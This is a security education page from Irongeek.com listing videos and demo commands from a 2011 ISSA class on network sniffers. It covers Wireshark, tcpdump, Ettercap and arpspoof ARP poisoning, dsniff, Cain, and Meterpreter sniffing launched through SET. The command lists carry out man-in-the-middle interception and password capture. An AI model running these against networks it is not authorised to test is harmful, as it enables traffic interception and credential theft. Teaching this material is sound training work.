A Logo

Feel free to include my content in your page via my
RSS feed

Help Irongeek.com pay for
bandwidth and research equipment:

Search Irongeek.com:

Affiliates:
ISDPodcast Button
RootSecure Button
Social-engineer-training Button
Irongeek Button

Web Hosting:
Dreamhost Logo
Help Irongeek.com pay for bandwidth and research equipment:

paypalpixle


Network Sniffers Class for the Kentuckiana ISSA 2011 (Hacking Illustrated Series InfoSec Tutorial Videos)

Network Sniffers Class for the Kentuckiana ISSA 2011

 

We decided to put on another sniffers class. This time Gary Hampton joins me to impart his knowledge of using Wireshark to diagnose problems on wireless networks. I cover the usual suspects:  TCPDump, Metasploit sniffing with Meterpreter, ARP Poisoning, Ettercap, Cain, NetworkMinor, Firesheep and Xplico. I lost part of Gary's on screen demo when my recording rig froze up, and I apparently did not make a proper sacrifice to the demo gods for my section when I tried to show off Ettercap filters, but I hope you still find it informative.

 

Part 1: Intro to Sniffers

 

Download: http://www.archive.org/download/IssaSniffersClass/sniffers1.avi

 

Part 2: Wireshark and Wireless with Gary Hampton


Download: http://www.archive.org/download/IssaSniffersClass/sniffers2.avi

 

Part 3: A little more Wireshark, TCPDump, Metasploit sniffing with Meterpreter, ARP Poisoning, Ettercap, Cain, NetworkMinor, Firesheep, Xplico and bridging.

 

 

Download: http://www.archive.org/download/IssaSniffersClass/sniffers3.avi 

 

Adrian's Slides

Gary's Slides

Commands used:

Wireshark Demo
 

1.       Run Wireshark

2.       Basic start capture

3.       Start capture with options

4.       Drill down OSI

5.       Capture filter options (4.9 in book)
not tcp port 3389
not broadcast and not multicast

6.       Show a packet

7.       Pop a packet out

8.       Sort by columns

9.       Follow stream (web traffic)

10.    Export HTTP Objects

11.    Simple view filters
tcp.port == 80
!(ip.addr == 192.168.1.13)

12.    Filter builder

13.    Apply filters from different panes (packet vs. details panes).

14.    Save filters

15.     Open a Wiki page

16.    Edit-> Find packet

17.    Analyzers ->Expert Info

18.    Analyzers ->Firewall ACLs

19.    Stats

20.    Color rules

21.    Save capture

22.    Mention Lua

Dumpcap/TCPDump

    dumpcap D
    dumpcap -i eth0 -s 0 -f "port 80" -w webtraffic.pcap

Sniffing in Monitor mode

   ifconfig wlan0 down
   iwconfig wlan0 mode monitor
   iwconfig wlan0 channel 1
   ifconfig wlan0 up

Ettercap Demo

1.      ettercap -T q i eth0 -M ARP // //

2.      ettercap -T q i eth0 -M ARP // /10.1.1.1/

3.      Show ARP traffic

4.      Telnet to 10.1.1.1

5.      http to 10.1.1.1

6.      FTP/Telnet/HTTP someplace with a password

7.      Show find sniffers
ettercap G
ettercap T I eth0 P list
ettercap T I eth0 P search_promisc  //

8.      Filters:
     etterfilter ig.filter -o ig.ef
     ettercap -T -q -F ig.ef -M ARP // //

9.      Mention MITM: icmp, dhcp, port filters

10.    driftnet -i eth0

11.    Etherape

 

Cain Demo

1.      Start poisoning

2.      Telnet to 10.1.1.1

3.      http to 10.1.1.1

4.      FTP/Telnet/HTTP someplace with a password

5.      SSL someplace from VM

6.      Sniff RDP

ARPSpoof Demo

   cat /proc/sys/net/ipv4/ip_forward
   echo 1 > /proc/sys/net/ipv4/ip_forward
   arpspoof -i eth0 10.0.0.1
   arpspoof -i eth0 -t 10.0.0.113 10.0.0.1
   dsniff I eth0 -c

NetworkMiner

1.      TCP fingerprinting

2.      Host details

3.      DHCP finger printing

4.      File capture

5.      Passwords

6.      Plaintext

7.      Open pcap

Bridging in Linux setup

    sudo apt-get install bridge-utils   

Script to setup MAC bridging:

    ifconfig eth0 0.0.0.0
    ifconfig eth1 0.0.0.0
    brctl addbr mybridge
    brctl addif mybridge eth0
    brctl addif mybridge eth1
    ifconfig mybridge up

Things to show while bridged

    ifconfig
    sudo tcpdump -i mybridge -s 0 -w out.cap
    sudo etherape -i mybridge
    sudo driftnet -i mybridge

Metasploit/SET

   Backtrack->Penetration->SET
   Menu Choices 2, 1, 2 (Google.com), 2, 2, default, no
   <go to page>
   sessions -i 1
   use sniffer
   help
   sniffer_interfaces
   sniffer_start 2
   sniffer_dump 2 /tmp/all.cap
   <Show in Wireshark>

More at http://www.offensive-security.com/metasploit-unleashed/Packet_Sniffing_With_Meterpreter

 

 

 

Printable version of this article

15 most recent posts on Irongeek.com:


If you would like to republish one of the articles from this site on your webpage or print journal please contact IronGeek.

Copyright 2014, IronGeek
Louisville / Kentuckiana Information Security Enthusiast